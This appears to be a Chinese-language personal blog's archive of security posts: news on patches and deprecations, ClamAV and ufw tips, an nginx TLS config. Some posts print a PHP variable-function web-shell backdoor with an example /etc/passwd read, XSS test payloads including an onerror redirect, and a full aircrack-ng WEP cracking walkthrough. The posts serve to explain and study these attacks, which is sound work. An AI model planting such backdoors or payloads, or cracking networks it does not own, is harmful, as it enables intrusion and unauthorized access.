顯示具有 資訊安全 標籤的文章。 顯示所有文章
顯示具有 資訊安全 標籤的文章。 顯示所有文章

2019/02/19

Kali Linux 2019.1 released

最新版 Kali Linux 2019.1 版釋出:

  • Linux kernel 更新至 4.19.13
  • Metasploit 更新至 v5.0

2018/10/29

clamav 掃描 Linux 上的病毒

clamav 預設會將所有掃描過的資料全部輸出到畫面,不管正常或是中毒,這個有點討厭。自己寫 script 做掉:
function clamscan() {
    clamscan -i -r $*
}

另外再寫個掃描整台電腦的 script
#!/usr/bin/env bash

DATE=`date '+%Y-%m-%d'`
LOG_PATH="/var/log/clamav"

# create log folder
mkdir -p  $LOG_PATH

clamscan -i -r /  2>&1 > "$LOG_PATH/$DATE.log"

2018/10/17

PHP 5.6 將在 2018 年底中止維護

目前 PHP 5 最後一個承載維護的版本:5.6,將於今年年底中止維護。也就是不會再有新功能,且就算有錯誤、安全漏洞也不會再繼續修補。

所以建議大家盡快升級手邊的 PHP 專案至 PHP 7。



個人的經驗,可以跳過 7.0 直接上 7.1,畢竟 7.1 主要是新增一些 7.0 還不支援的功能,沒有他太大的異動。7.2 主要是對效能調整,和新增一些語法,要直接跳 7.2 也不會花太多時間改程式。

預計在 2020 年廢除 TLS 1.0 以及1.1 的支援

這新聞各大媒體都有報導了:

簡單來說:
  • 多數瀏覽器均支援 TLS 1.2
  • TLS 1.0 已經 20 歲、TLS 1.1 也 12 歲了,並且有已知攻擊「POODLE」和「BEAST
  • 剩下少數瀏覽器仍在使用舊版通訊協定 (Edge ... 你看看你)

若手邊有機器需要調整設定,可參考:

2018/05/08

7zip 被發現安全漏洞,請進速更新至 18.05

CIS 原文:
Successful exploitation of this vulnerability could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.
7zip 的漏洞可讓惡意使用者控制電腦,所有 18.05 以下的版本均受到影響。

請進訴將電腦中的 7zip 更新至最新版本

2017/10/18

各家廠商針對 wifi Krack 的動作

KRACK 問題不是僅針對特定 WPA 戰點的問題,而是通訊協定上面的問題,基本上各家廠商都需要為了這個漏洞進行修補。

BleepingComputer 網站上的作者,已經至各大 wifi 供應商搜尋官方回應以及解決 KRACK 的動作,可以看到 Cisco、D-Link、DrayTek、MikroTik、Netgear、TP-Link、Zyxel 幾乎都有動作了:https://www.bleepingcomputer.com/news/security/list-of-firmware-and-driver-updates-for-krack-wpa2-vulnerability/

補充:Github 這邊有更詳細的整理


至於 ASUS 呢?官方討論區一堆人在問,但是官方完全沒有回應。這可能會是以後我買 wifi AP 的一個評分項目 .....

2017/05/05

為 ufw 建立應用程式的 rule set

以往在 ufw 加入防火牆規則時,都是一條一條新增上去:
ufw allow 80
ufw allow 443
ufw allow 8080
.....

這種方式雖然簡單,但是之後要維護會有點困難:到底哪個 port 是為了哪一個應用程式開的?

ufw 其實還有其他特別功能,叫做 app list:
zero@zero-x230:~$ sudo ufw app list
Available applications:
  Apache
  Apache Full
  Apache Secure
  CUPS
  Samba

會自動增測,並有預設的設定檔來幫你新增 rule set。來看一下「Apache Full」設定檔到底寫了什麼,打開「/etc/ufw/applications.d/」:
[Apache]
title=Web Server
description=Apache v2 is the next generation of the omnipresent Apache web server.
ports=80/tcp

[Apache Secure]
title=Web Server (HTTPS)
description=Apache v2 is the next generation of the omnipresent Apache web server.
ports=443/tcp

[Apache Full]
title=Web Server (HTTP,HTTPS)
description=Apache v2 is the next generation of the omnipresent Apache web server.
ports=80,443/tcp

預設有三個 rule sets,一個是 port 80,另一個是 HTTPS 的 port 443,亦或二者都開啟。

我們可以依樣畫葫蘆,建立自己的 app rule sets,像是我幫 Resilio Sync 湊出來的 rule set

你也可以參考 Ubuntu forum 上面的教學,建立自己需要的 rule set。

2016/05/22

不需要 PHP eval() 即可執行使用者自訂動作的寫法

以往 PHP 後門都用很簡單的語法去撰寫,例如:
echo eval($_GET['action']);

不過由於 eval() 這個寫法實在是太常見了,若是站方手動做掃描實在很容易被發現。之前看到一個新的寫法,利用 PHP variable functions 的語法來製作後門:
echo $_GET['a']($_GET['b']);

惡意人士可以在網址上使用參數來取得需要的資訊:
http://my.target.site/backdoor.php?a=file_get_contents&b=../../../../etc/passwd

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin .....

上面這語法沒有使用到 PHP 內建的任何函式,在加上 GET 參數的名稱可以任意設定,用關鍵字搜尋的方法是很難抓出來的。

只能說想到這種寫法的人實在很有創意 XD

2016/03/02

SSLv2 可能也不安全了

More than 11 million HTTPS websites imperiled by new decryption attack
http://arstechnica.com/security/2016/03/more-than-13-million-https-websites-imperiled-by-new-decryption-attack/

解釋:
最新的 SSL connection 攻擊:DROWN attack
https://blog.gslin.org/archives/2016/03/02/6381/


目前自己的機器好像沒受到影響,被份一下 nginx 的 HTTP 設定 (從多方搜尋來得設定值):
ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_ciphers 'ECDHE-RSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-GCM-SHA384:ECDHE-ECDSA-AES256-GCM-SHA384:DHE-RSA-AES128-GCM-SHA256:DHE-DSS-AES128-GCM-SHA256:kEDH+AESGCM:ECDHE-RSA-AES128-SHA256:ECDHE-ECDSA-AES128-SHA256:ECDHE-RSA-AES128-SHA:ECDHE-ECDSA-AES128-SHA:ECDHE-RSA-AES256-SHA384:ECDHE-ECDSA-AES256-SHA384:ECDHE-RSA-AES256-SHA:ECDHE-ECDSA-AES256-SHA:DHE-RSA-AES128-SHA256:DHE-RSA-AES128-SHA:DHE-DSS-AES128-SHA256:DHE-RSA-AES256-SHA256:DHE-DSS-AES256-SHA:DHE-RSA-AES256-SHA:AES128-GCM-SHA256:AES256-GCM-SHA384:AES128-SHA256:AES256-SHA256:AES128-SHA:AES256-SHA:AES:CAMELLIA:DES-CBC3-SHA:!aNULL:!eNULL:!EXPORT:!DES:!RC4:!MD5:!PSK:!aECDH:!EDH-DSS-DES-CBC3-SHA:!EDH-RSA-DES-CBC3-SHA:!KRB5-DES-CBC3-SHA';
ssl_prefer_server_ciphers on;


若不清楚自己的 server 設定是否安全,可以透過 SSL Labs 提供的服務,來檢查是否有什麼潛在的問題。

2016/02/23

準備離開 StartSSL

Why I stopped using StartSSL (Hint: it involves a Chinese company)
https://pierrekim.github.io/blog/2016-02-16-why-i-stopped-using-startssl-because-of-qihoo-360.html

由於 cert 被扔到大陸機房去,所以還是換家 SSL provider 比較安全一點。

噗浪上有不少朋友提供 Let's Encrypt 的解決方案,除了「root can only help」以外,好像沒什麼奇怪的地方。另外 JoeHorn 寫了一個全自動 renew 的 script,假日的時候來玩玩看 ~

2013/11/01

Interesting XSS Sample

比較常見的 XSS 多安插 javascript 程式在 HTML 元素中:
<img src="javascript:alert('XSS')">

最近發現有趣的攻擊方式:
<img/src=x oooooo/oooooooooo/onerror="top.location='http://zeroplex.blogspot.com'" >

這對程式碼本身並不具危險性,但瀏覽器開啟上面那一段 HTML 時,卻會自動重新導向到 zeroplex.blogspot.com

主要原因是,瀏覽器都有提供語法自動補齊、修正功能。眼尖的人應該會發現,上面那一段語法,使用 Chrome 的開發者工具 (非檢視原始碼) 開啟時,會被自動修成 (top.location 改掉以便 debug):




恐怖的是,瀏覽器將最後面的語法修道可以執行,因此 %lt;img src="x"> 時,瀏覽器無法擷取圖片,造成 error,而觸發了後半部 onError 事件,執行 top.localtion="http://zeroplex.blogspot.com" 而跳到我的部落格頁面

2012/06/13

XSS Filter on CodeIgniter

過去防止 XSS 攻擊都是透過 htmlspecialchars() 將「<」、「>」等符號編碼,但若是前端有使用 CKEditor 之類工具,文章中的樣式也會全部被洗掉。

最近用 CodeIgniter Input class 提供的 XSS filter 時,無意間發現 filter 不是將所有特殊符號過濾掉,而是經過 parser 以後才決定哪些標籤和屬性需要刪除。


一般常見用來測試 XSS 的字串:
<script>alert(123)</script>

輸出:
[removed]alert(123)[removed]



若是將 javascript 嵌在屬性當中,CodeIgniter 會將標籤留下、屬性刪除:
<a href="#" onclick="alert(123)">test</a>

輸出:
<a >test</a>

2012/01/07

用 aircrack 解 WEP 密碼


查詢 AP 資訊,找出目標 SSID 和 channel:
$ sudo iwlist wlan0 scanning
          Cell 01 - Address: 00:14:6C:7E:40:80
                    Channel:11
                    Frequency:2.462 GHz (Channel 11)
                    Quality=39/70  Signal level=-71 dBm  
                    Encryption key:on
                    ESSID:"Zeroplex"

用 airmon-ng 進入監聽模式,注意最後一個參數是目標 AP 所用的 channel:
$ sudo airmon-ng start wlan0 11

Interface Chipset  Driver

wlan0  RTL8187  rtl8187 - [phy2]
    (monitor mode enabled on mon0)

訊息後方有顯示模擬來監聽的網卡,之後 aireplay-ng 和 airodump-ng 會用這個 device。先用 aireplay-ng 檢查與目標 AP 的通訊狀況,參數「-9」表示做 injection test:
$ sudo aireplay-ng -9 -e Zeroplex mon0
21:39:04  Waiting for beacon frame (ESSID: Zeroplex) on channel 11
Found BSSID "00:14:6C:7E:40:80" to given ESSID "Zeroplex".
21:39:04  Trying broadcast probe requests...
21:39:04  Injection is working!
21:39:06  Found 1 AP 

21:39:06  Trying directed probe requests...
21:39:06  00:14:6C:7E:40:80 - channel: 11 - 'Zeroplex'
21:39:06  Ping (min/avg/max): 0.604ms/10.323ms/37.851ms Power: -14.86
21:39:06  29/30:  96%

最後一行的百分比表示訊號概況,數值越高表示成功率越高,距離 AP 太遠或是太近都會有影響。

準備好後就可以開始用 airodump-ng 監聽。參數「-i」表示只記錄對破解有用的資訊,沒有家䢢這個參數時,airodump-ng 會記錄所有封包內容,若有人在抓 BT 小心硬碟被吃光光;參數「-w」後加上記錄檔名稱;「--bssid」為目標 AP 的 MAC address、「-c」是channel,若沒有指定特定目標,airodump-ng 會記錄所有接收到的資訊。


$ sudo airodump-ng --bssid 00:14:6C:7E:40:80 -c 11 -i -w data mon0

 CH 11 ][ Elapsed: 0 s ][ 2012-01-07 21:48                                         
                                                                                                                            
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                         
                                                                                                                            
 00:14:6C:7E:40:80  -20   0        9        1    0  11  54e. WEP WEP        Zeroplex        

Beacons 與 Data 數量越多對破解越有利。

最後使用 aircrack 嘗試解開密碼:
$ aircrack-ng record-01.cap -l key.txt


解密碼會花上一段時間,若有成功解開密碼,會將密碼寫進 key.txt 裡;若資訊量不足以解開密碼,請繼續監聽,直到 IVs 達到門檻值後再嘗試。


aircrack 的 tutorial 裡面還有介紹 aireplay-ng 的其他玩法,有興趣的可以試試看。

Tutorial: Simple WEP Crack
http://www.aircrack-ng.org/doku.php?id=simple_wep_crack

2010/07/20

HIT 2010

上一次參加資安類型的研討會是在 SA @ Tainan 由 CIH 主講,不過駭客年會得規模實在大非常多。

很慶幸這次參加 HIT 2010,雖然議程幾乎都聽不懂,不過認識了很多人,還遇到了五年沒碰面的高中同學,其中一個還在今天 Wargame 冠軍的交大 DSNS 實驗室。

今年的梗不少,筆記一下:
  • 主持人:「大家都知道網路很髒 ....」
  • 360 講師:「裝了防毒,吃了一大堆資源,雙核都變成單核」
  • 「這應該是 360 殺生軟件,有人聽到掛 ....」
  • 提問:「剛剛提到 Google ....,如果現在不方便說的話 .... 畢竟您還要回大陸嘛」
    IRC:「I don't care」
  • 講師:「大家都知道要靠旁邊走,走中間會被當靶子」(Movement Trajectory in game bot detect)
  • 主持人:「我們來看一下今天 Wargame 的戰況 .... 阿,我被 sproofing 了」
  • Orange 上台,IRC:「Hey apple !!!」
  • 「7+11」、「萊富爾」
  • 講師:「我非常希望能在 ibon 拿到 HIT 免費入場卷」
  • 改一張二萬元的「iCrash」當作 Wargame 獎品

最後感謝會場工作人員和與會者讓我有這麼「駭人」的經驗,也要感謝澔哥、小佳、洪爺 (此洪爺非彼洪爺)、CYJ 和 SA @ Taipei 願意與我共進晚餐。

2010/01/26

錯覺與圖形驗證



以前和朋友討論很久,如果單單使用扭曲、變形、雜訊的方式,以現在電腦的圖形運算能力要破解圖形驗證碼不錯太難。在一次機會下看到一個專門收集視覺錯覺的網站:Optical Illusion Galleries,再加上一個在日本多媒體公司工作的朋友告知,已經有研究想要使用錯覺來使電腦可以計算 2D 圖形來產生 3D 畫面的效果,覺得圖形驗證碼也可以網這個方向嘗試。

人類的眼睛對平面「邊界」特別敏感,所以上面的圖形看起來眼花,但是能很清楚的看到其中的英文字。不過為了製作圖形,在 Phoroshop 裡面開了三個以上的圖層外加一個文字遮罩,要即時產生很耗電腦資源;如果針對這個圖案進行邊緣偵測,說不定還是可以描出大致的輪廓吧。

但是還有很多種錯覺可以善加利用:


順時鐘?或是逆時鐘?



圖行在旋轉?



A、B 區塊的顏色其實是一樣的



上個月發現 Plurk 的圖形驗證碼也很有趣:在 Flickr 搜尋工具下區別很大關鍵字,利用搜尋結果的圖片作為驗證工具。



這個作法的好處是完全不用自己處理影像,因為「人」已經全部做好了:影像中的物體辨識、上標籤、定關鍵字 .... etc。就像之前 Google 出的遊戲「Image Labeler」一樣,用人的頭腦來做計算 XD

2009/09/25

原來現在硬碟都不用錢

上一篇說 Facebook 什麼資料都會封存,不過還有另一間公司存了更多資料!



從大一做了什麼事情到現在都還有資料,連幾點幾分都沒漏掉,Facebook 跟他比起來實在還算小咖,不過做事低調且不會亂用資料。

其實這間公司還有更厲害的地方,如果有在搜尋檔案載點的話,應該不難發現有些論壇明明要登入才看的到內容,但是搜尋引擎沒有登入卻可以為內容建立索引!我猜秘密就才在瀏覽器上面的小工具列......

ps. 好險當初還算認真,歷史紀錄沒讓我難堪 XDDDDD

2009/09/23

以前 Facebook 讓我不爽的只是無法刪除帳號,不過人氣越來越旺以後,才發現 Facebook 很賊。



上傳的照片、圖檔將全部歸 Facebook 所有,所以在其他廣告上面出現自己的照片不要太訝異。我猜 Facebook 連真實姓名修改都有紀錄檔,改掉以後真實姓名還是會在資料庫裡面,大家還是小心為妙,個人資料最好不要給真的,反正台灣把 Facebook 拿來當交友網站的人不多。

這讓我想起一個相聲段子:
A:我打詐騙電話
B:我接詐騙電話
A:我騙你 10 萬!
B:我給你假鈔!

2009/06/04

EFix 搬家

原來 EFix 搬家,難怪之前的 Page2RSS 一直都沒有動靜。既然現在移到 Blogger 訂閱就方便多了。

EFix 隨身碟病毒移除工具
http://reinfors.blogspot.com/

2009/05/17

另一牌防毒軟體比較好

心情差又看不下書,上來廢話。

老是聽到身邊有人在吵:
「不要裝 K 啦,吃記憶體又會亂砍資料」
「你裝那個 A 哪有比較好,隨身碟病毒都抓不到」
「別吵,我裝 F 二年都沒中毒」 ..... 說話的人沒報告不開電腦


我覺得最有趣的一點,就是大家都不肯跳出自己的想法,聽聽別人的意見。如果發現每個防毒軟體都有人罵、每個防毒軟體都有人捧,那錯還是錯在防毒軟體嗎?舉個例子好了。

有人看到一個網站能幫你查出有誰封鎖自己,便很開心的打帳號密碼登入,登入失敗以後還覺得自己手殘,連續登入了三、四次後放棄。過了幾天,這個釣魚網站上了新聞。

另一個例子,我在大二下學期決定不安裝防毒軟體了,只用了網路上一個有基本功能的防火牆,就這樣安靜的過了一年多 (我寫過怎麼檢測病毒的教學,不用懷疑中毒自己不知道吧)。後來覺得 SP3 沒有鬧什麼新聞以後,決定在假期間升級,升級以後就爆炸重灌了。

由以上兩個例子可以知道事在人為,防毒軟體只能說是輔助工具,並不能解決所有的問題。如果要絕對的安全你可能需要考慮以下幾種方式:
  • 不要裝作業系統
  • 不要插電源線
  • 不要使用任何有運算功能的電器產品

ps. 聖人也有犯錯的一天,所以硬體也不可靠 XD